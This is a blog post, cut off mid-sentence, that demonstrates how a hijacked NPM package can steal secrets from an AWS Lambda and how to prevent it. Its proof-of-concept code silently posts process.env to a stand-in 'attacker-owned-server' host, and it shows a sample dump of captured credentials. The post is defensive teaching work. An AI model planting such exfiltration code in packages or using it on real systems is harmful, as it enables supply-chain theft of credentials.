Forem: Max Ivanov The latest articles on Forem by Max Ivanov (@maxivanov). https://forem.com/maxivanov https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F517878%2Ff216ec89-2513-4d84-a18e-7a3988f7c629.png Forem: Max Ivanov https://forem.com/maxivanov en How a compromised NPM package can steal your secrets (POC + prevention) Max Ivanov Sat, 17 Apr 2021 20:58:46 +0000 https://forem.com/maxivanov/how-a-compromised-npm-package-can-steal-your-secrets-poc-prevention-54jk https://forem.com/maxivanov/how-a-compromised-npm-package-can-steal-your-secrets-poc-prevention-54jk <p>Any decently sized Node.js project depends on multiple <strong>3rd party NPM packages</strong>. In turn, each of those may have dependencies as well. Which leaves you with a <strong>ton of code</strong> that you didn't write, that you don't control and don't have much visibility over during package updates. It may take one compromised package in that dependency graph to <strong>steal secrets</strong> from your production environment. The package may appear to be vulnerable to <a href="https://owasp.org/www-community/attacks/Code_Injection" rel="noopener noreferrer">code injection</a> or it may get hacked resulting in malicious code added to the package's source code. It happened <a href="https://techbeacon.com/security/check-your-dependencies-githubs-npm-finds-nasty-trojan-packages" rel="noopener noreferrer">before</a> and <a href="https://snyk.io/blog/malicious-code-found-in-npm-package-event-stream/" rel="noopener noreferrer">not once</a>, and surely we will see similar incidents in the future.</p> <p>If such a compromised package gets deployed to the production servers, it may run the attacker's supplied malicious code at some point. One thing that the code can do is collect the information about the <strong>environment</strong> and send it to the attacker's owned endpoint. In this post we will go over an example of such (manually crafted) compromised package to see how it can be exploited. The environment we will use is Node.js running in AWS Lambda, but the technique applies to other languages and cloud providers as well.</p> <p>Finally we will see how to make it harder to exploit this type of vulnerability and how to <strong>prevent</strong> it completely (the cost here is added configuration complexity).</p> <p>You can find all of the examples in the <a href="https://github.com/maximivanov/nodejs-leak-env-vars" rel="noopener noreferrer">article repository</a>, each example contains a snippet of code and Terraform scripts to deploy it to AWS.</p> <h2> Compromised package </h2> <p>Imagine your application uses an external package. Let's say it's a super complex implementation of a <code>sum(a, b)</code> function - naive but sufficient for the demo purposes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">async</span> <span class="kd">function</span> <span class="nf">sum</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">a</span> <span class="o">+</span> <span class="nx">b</span> <span class="p">}</span> <span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">sum</span><span class="p">,</span> <span class="p">}</span> </code></pre> </div> <p>The package got hacked. Maybe author's NPM credentials were stolen and new version of the package containing <strong>malicous code was published</strong>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">phoneHomeUrl</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">https://attacker-owned-server</span><span class="dl">'</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">sum</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span> <span class="k">await</span> <span class="nf">post</span><span class="p">(</span><span class="nx">phoneHomeUrl</span><span class="p">,</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">)</span> <span class="k">return</span> <span class="nf">originalSum</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">originalSum</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">a</span> <span class="o">+</span> <span class="nx">b</span> <span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">post</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="nx">data</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span> <span class="p">}</span> <span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">sum</span><span class="p">,</span> <span class="p">}</span> </code></pre> </div> <p>In addition to performing the calculations the package was already doing, the code was added to post the <strong>environment variables</strong> to the attacker's server. Normally if you install the compromised package, you wouldn't even know it's phoning home since it still performs its function.</p> <p><a href="https://github.com/maximivanov/nodejs-leak-env-vars/tree/master/compromised-npm-package" rel="noopener noreferrer">Source for the compromised package</a>.</p> <h2> Phone-home listener </h2> <p>I've implemented the collecting endpoint with AWS Lambda. It simply dumps all incoming request details to Cloudwatch, where we can inspect them later.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async </span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">Got call home! Event: </span><span class="dl">'</span><span class="p">,</span> <span class="nx">event</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="p">{</span> <span class="na">status</span><span class="p">:</span> <span class="dl">'</span><span class="s1">OK</span><span class="dl">'</span><span class="p">,</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">response</span> <span class="p">}</span> </code></pre> </div> <p><a href="https://github.com/maximivanov/nodejs-leak-env-vars/tree/master/phone-home-listener" rel="noopener noreferrer">Source for the phone home listener</a>.</p> <h2> Vulnerable app example </h2> <p>Now here's our vulnerable app that uses the compromised package. Again, it's a Lambda function that generates two random numbers and calls the package's sum to get the result, which is returned to the function caller.</p> <p>The function uses a secret <code>MY_SECRET</code>, which could be a connection string for the database defined as an environment variable in plain text.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="p">{</span> <span class="nx">sum</span> <span class="p">}</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">compromised-npm-package</span><span class="dl">'</span><span class="p">)</span> <span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">secretFromEnv</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">MY_SECRET</span> <span class="c1">// use the secret somehow... we'll just log it</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">secretFromEnv</span><span class="dl">'</span><span class="p">,</span> <span class="nx">secretFromEnv</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">a</span> <span class="o">=</span> <span class="nf">randomInteger</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">b</span> <span class="o">=</span> <span class="nf">randomInteger</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">sum</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">result</span><span class="p">,</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">response</span> <span class="p">}</span> <span class="kd">function</span> <span class="nf">randomInteger</span><span class="p">(</span><span class="nx">min</span><span class="p">,</span> <span class="nx">max</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">Math</span><span class="p">.</span><span class="nf">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nf">random</span><span class="p">()</span> <span class="o">*</span> <span class="p">(</span><span class="nx">max</span> <span class="o">-</span> <span class="nx">min</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">+</span> <span class="nx">min</span> <span class="p">}</span> </code></pre> </div> <p>If we invoke this function through the AWS CLI:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@bf12d39e866c:/var/app/vulnerable-app# aws lambda invoke <span class="nt">--function-name</span> leak-env-vars-poc-lambda-function out.txt <span class="o">{</span> <span class="s2">"StatusCode"</span>: 200, <span class="s2">"ExecutedVersion"</span>: <span class="s2">"</span><span class="nv">$LATEST</span><span class="s2">"</span> <span class="o">}</span> </code></pre> </div> <p>It will call the compromised package's <code>sum()</code> function which in turn will send <code>process.env</code> to the catch-all HTTP endpoint. Looking at the Cloudwatch logs of the listener function we will see the secret from the vulnerable function:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F04%2Fhow-compromised-npm-package-can-steal-your-secrets%2Fplain-text-env-captured.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F04%2Fhow-compromised-npm-package-can-steal-your-secrets%2Fplain-text-env-captured.webp" alt="plain text env captured"></a></p> <p>But not only that! In fact it captures the <strong>temporary AWS credentials</strong> of the Lambda function as well. If you're curious how the <strong>full dump of Node.js environment variables</strong> looks like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"AWS_LAMBDA_FUNCTION_VERSION"</span><span class="p">:</span><span class="w"> </span><span class="s2">"$LATEST"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_SESSION_TOKEN"</span><span class="p">:</span><span class="w"> </span><span class="s2">"IQoJb3JpZ2luX2VjEKD//////////wEaCXVzLWVhc3QtMSJIMEYCIQCKn..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"LAMBDA_TASK_ROOT"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/var/task"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_LAMBDA_LOG_GROUP_NAME"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/aws/lambda/leak-env-vars-poc-lambda-function"</span><span class="p">,</span><span class="w"> </span><span class="nl">"LD_LIBRARY_PATH"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_LAMBDA_LOG_STREAM_NAME"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2021/04/14/[$LATEST]629e422565134af5ae33e69a125a2d41"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_LAMBDA_RUNTIME_API"</span><span class="p">:</span><span class="w"> </span><span class="s2">"127.0.0.1:9001"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_EXECUTION_ENV"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AWS_Lambda_nodejs14.x"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_LAMBDA_FUNCTION_NAME"</span><span class="p">:</span><span class="w"> </span><span class="s2">"leak-env-vars-poc-lambda-function"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_XRAY_DAEMON_ADDRESS"</span><span class="p">:</span><span class="w"> </span><span class="s2">"169.254.79.2:2000"</span><span class="p">,</span><span class="w"> </span><span class="nl">"PATH"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin"</span><span class="p">,</span><span class="w"> </span><span class="nl">"MY_SECRET"</span><span class="p">:</span><span class="w"> </span><span class="s2">"this is my secret value"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_DEFAULT_REGION"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"PWD"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/var/task"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_SECRET_ACCESS_KEY"</span><span class="p">:</span><span class="w"> </span><span class="s2">"9g484jcds9gQcpt6N4QnRj4v4mj8r..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"LAMBDA_RUNTIME_DIR"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/var/runtime"</span><span class="p">,</span><span class="w"> </span><span class="nl">"LANG"</span><span class="p">:</span><span class="w"> </span><span class="s2">"en_US.UTF-8"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_LAMBDA_INITIALIZATION_TYPE"</span><span class="p">:</span><span class="w"> </span><span class="s2">"on-demand"</span><span class="p">,</span><span class="w"> </span><span class="nl">"NODE_PATH"</span><span class="p">:</span><span class="w"> </span><span class="s2">"/opt/nodejs/node14/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_REGION"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"TZ"</span><span class="p">:</span><span class="w"> </span><span class="s2">":UTC"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_ACCESS_KEY_ID"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ASIARV6QASLKD..."</span><span class="p">,</span><span class="w"> </span><span class="nl">"SHLVL"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"_AWS_XRAY_DAEMON_ADDRESS"</span><span class="p">:</span><span class="w"> </span><span class="s2">"169.254.79.2"</span><span class="p">,</span><span class="w"> </span><span class="nl">"_AWS_XRAY_DAEMON_PORT"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2000"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_XRAY_CONTEXT_MISSING"</span><span class="p">:</span><span class="w"> </span><span class="s2">"LOG_ERROR"</span><span class="p">,</span><span class="w"> </span><span class="nl">"_HANDLER"</span><span class="p">:</span><span class="w"> </span><span class="s2">"index.handler"</span><span class="p">,</span><span class="w"> </span><span class="nl">"AWS_LAMBDA_FUNCTION_MEMORY_SIZE"</span><span class="p">:</span><span class="w"> </span><span class="s2">"128"</span><span class="p">,</span><span class="w"> </span><span class="nl">"_X_AMZN_TRACE_ID"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Root=1-60777b72-13a6527d3ff1094a29ae72ca;Parent=77ee64a10c682226;Sampled=0"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Prevention: fetch secrets at runtime </h2> <p>One rather simple way to prevent leakage of secrets is to <strong>not store them in plain text</strong> in environment variables. Rather keep them in AWS <a href="https://docs.aws.amazon.com/systems-manager/latest/userguide/systems-manager-parameter-store.html" rel="noopener noreferrer">Parameter Store</a> (free, limited scaling) or <a href="https://aws.amazon.com/secrets-manager/" rel="noopener noreferrer">Secrets Manager</a> (pay per secret/month + per every 10k calls). The application would then read the secret value <strong>at runtime and keep it in memory</strong> for future reuse. Here's how the previous vulnerable example can be adapted:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="p">{</span> <span class="nx">sum</span> <span class="p">}</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">compromised-npm-package</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">AWS</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">aws-sdk</span><span class="dl">'</span><span class="p">)</span> <span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">secretFromSsm</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetchSecret</span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">MY_SECRET_NAME</span><span class="p">)</span> <span class="c1">// use the secret somehow... we'll just log it</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">secretFromSsm</span><span class="dl">'</span><span class="p">,</span> <span class="nx">secretFromSsm</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">a</span> <span class="o">=</span> <span class="nf">randomInteger</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">b</span> <span class="o">=</span> <span class="nf">randomInteger</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">sum</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">result</span><span class="p">,</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">response</span> <span class="p">}</span> <span class="kd">function</span> <span class="nf">randomInteger</span><span class="p">(</span><span class="nx">min</span><span class="p">,</span> <span class="nx">max</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nb">Math</span><span class="p">.</span><span class="nf">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nf">random</span><span class="p">()</span> <span class="o">*</span> <span class="p">(</span><span class="nx">max</span> <span class="o">-</span> <span class="nx">min</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">+</span> <span class="nx">min</span> <span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">fetchSecret</span><span class="p">(</span><span class="nx">name</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">ssm</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">AWS</span><span class="p">.</span><span class="nc">SSM</span><span class="p">({</span> <span class="na">region</span><span class="p">:</span> <span class="dl">'</span><span class="s1">us-east-1</span><span class="dl">'</span> <span class="p">})</span> <span class="kd">const</span> <span class="nx">options</span> <span class="o">=</span> <span class="p">{</span> <span class="na">Name</span><span class="p">:</span> <span class="nx">name</span><span class="p">,</span> <span class="na">WithDecryption</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">data</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">ssm</span><span class="p">.</span><span class="nf">getParameter</span><span class="p">(</span><span class="nx">options</span><span class="p">).</span><span class="nf">promise</span><span class="p">()</span> <span class="k">return</span> <span class="nx">data</span> <span class="p">}</span> </code></pre> </div> <p>When running the app, it will still post the environment variables to the attacker's server, but it <strong>won't include user-provided secrets</strong> anymore. It will still include temporary AWS credentials though, so the attacker could use those to fetch the secret from the Parameter Store directly (considering they know the name of the parameter).</p> <p>What about the <strong>exposed AWS credentials</strong>? True, anyone who has them can assume the <strong>associated IAM role</strong> and access the AWS resources. That's why it's critical to always grant only the <strong>minimum required permissions</strong> to the application IAM roles.</p> <p>Source code for the upgraded app + Terraform resources to create SSM parameter and grant Lambda access to the parameter: <a href="https://github.com/maximivanov/nodejs-leak-env-vars/tree/master/leak-env-vars-poc-fetch-secrets-runtime" rel="noopener noreferrer">poc repository</a>.</p> <h2> Prevention: block outbound connections </h2> <p>If your application does not need to access the internet, you can <strong>block outbound connections</strong> altogether. For that you need to put the Lambda in a virtual network (VPC) which has no route out by default.</p> <p>Application code will not change. Here are the changes you need to make to the infrastructure. Create a VPC, a private subnet and explicitly define a security group. Security group does not have any outbound rules, but even if it did, there's no Internet Gateway associated with the VPC which effectively <strong>disables all egress connections</strong>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_vpc"</span> <span class="s2">"vpc"</span> <span class="p">{</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_cidr_block</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-vpc"</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_subnet"</span> <span class="s2">"subnet_private"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">subnet_private_cidr_block</span> <span class="nx">map_public_ip_on_launch</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-subnet-private"</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_default_security_group"</span> <span class="s2">"default_security_group"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">ingress</span> <span class="p">{</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="nx">-1</span> <span class="nx">self</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="p">}</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-default-security-group"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Associate the Lambda with the subnet and security group:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_lambda_function"</span> <span class="s2">"lambda_function"</span> <span class="p">{</span> <span class="p">...</span> <span class="nx">vpc_config</span> <span class="p">{</span> <span class="nx">subnet_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">subnet_private</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="nx">security_group_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_default_security_group</span><span class="p">.</span><span class="nx">default_security_group</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>With infra changes applied, if you try to run the application it will simply time out at Lambda's <strong>configured max execution time</strong>, while the malicous code is helplessly waiting to send the environment vars out.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@bf12d39e866c:/var/app/leak-env-vars-poc-outbound-blocked/terraform# aws lambda invoke <span class="nt">--function-name</span> leak-env-vars-poc-outbound-blocked-lambda-function out.txt <span class="o">{</span> <span class="s2">"StatusCode"</span>: 200, <span class="s2">"FunctionError"</span>: <span class="s2">"Unhandled"</span>, <span class="s2">"ExecutedVersion"</span>: <span class="s2">"</span><span class="nv">$LATEST</span><span class="s2">"</span> <span class="o">}</span> root@bf12d39e866c:/var/app/leak-env-vars-poc-outbound-blocked/terraform# <span class="nb">cat </span>out.txt <span class="o">{</span><span class="s2">"errorMessage"</span>:<span class="s2">"2021-04-15T21:25:23.784Z 83617d65-31d1-4806-83b0-b5ec75be0e3f Task timed out after 5.01 seconds"</span><span class="o">}</span> </code></pre> </div> <p>The secrets won't be leaked. But it also means your app will stop working before you <strong>remove the malicous code</strong> blocking execution.</p> <p>Code for the <a href="https://github.com/maximivanov/nodejs-leak-env-vars/tree/master/leak-env-vars-poc-outbound-blocked" rel="noopener noreferrer">blocked outbound connections</a> example.</p> <h2> Prevention: whitelist outbound connections </h2> <p>But what if your function does make <strong>requests to the Internet</strong>? You can <strong>whitelist</strong> the allowed destinations in the security group rules. </p> <p>Let's say our app depends on this <a href="https://api.chucknorris.io/" rel="noopener noreferrer">legitimate API</a>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="p">{</span> <span class="nx">sum</span> <span class="p">}</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">compromised-npm-package</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">https</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">https</span><span class="dl">'</span><span class="p">)</span> <span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">secretFromEnv</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">MY_SECRET</span> <span class="c1">// use the secret somehow... we'll just log it</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">secretFromEnv</span><span class="dl">'</span><span class="p">,</span> <span class="nx">secretFromEnv</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">randomFactRaw</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://api.chucknorris.io/jokes/random</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">randomFact</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="nx">randomFactRaw</span><span class="p">).</span><span class="nx">value</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">randomFact</span><span class="dl">'</span><span class="p">,</span> <span class="nx">randomFact</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">a</span> <span class="o">=</span> <span class="nf">randomInteger</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">b</span> <span class="o">=</span> <span class="nf">randomInteger</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">sum</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="p">{</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">,</span> <span class="nx">result</span><span class="p">,</span> <span class="nx">randomFact</span><span class="p">,</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">response</span> <span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">fetch</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span> <span class="p">...</span> <span class="p">}</span> </code></pre> </div> <p>Let's find out the <strong>IP addresses</strong> of the API:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F04%2Fhow-compromised-npm-package-can-steal-your-secrets%2Fhost-chuck-norris-api.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F04%2Fhow-compromised-npm-package-can-steal-your-secrets%2Fhost-chuck-norris-api.webp" alt="chuck norris api ip"></a></p> <p>And whitelist them in the security group:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_default_security_group"</span> <span class="s2">"default_security_group"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">ingress</span> <span class="p">{</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="nx">-1</span> <span class="nx">self</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="p">}</span> <span class="nx">egress</span> <span class="p">{</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">443</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">443</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="s2">"tcp"</span> <span class="nx">cidr_blocks</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"104.21.4.135/32"</span><span class="p">,</span> <span class="s2">"172.67.132.31/32"</span><span class="p">]</span> <span class="p">}</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-default-security-group"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>To enable outbound network access for the Lambda, a number of resources will need to be added: Internet Gateway, NAT Gateway, route tables. This is out of the scope of this post, and you may want to check <a href="https://www.maxivanov.io/deploy-aws-lambda-to-vpc-with-terraform/" rel="noopener noreferrer">Deploy AWS Lambda to VPC with Terraform</a>.</p> <p>With app code updated and network resources deployed, if we invoke 